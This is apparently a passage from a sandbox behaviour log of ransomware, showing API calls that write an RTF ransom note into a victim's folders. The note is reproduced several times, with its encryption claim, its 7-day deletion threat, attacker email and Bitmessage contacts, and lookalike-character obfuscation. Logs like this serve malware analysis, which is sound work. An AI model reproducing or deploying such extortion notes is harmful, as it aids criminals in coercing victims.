the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n£\x94\x12ç]z9úW­Á\x7fvß\x84ôΧÐùæËH3\n", lpUsedDefaultChar=0x0) returned 8717 [0278.530] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.531] CloseHandle (hObject=0x2c8) returned 1 [0278.531] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0278.531] GetLastError () returned 0x2 [0278.531] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will 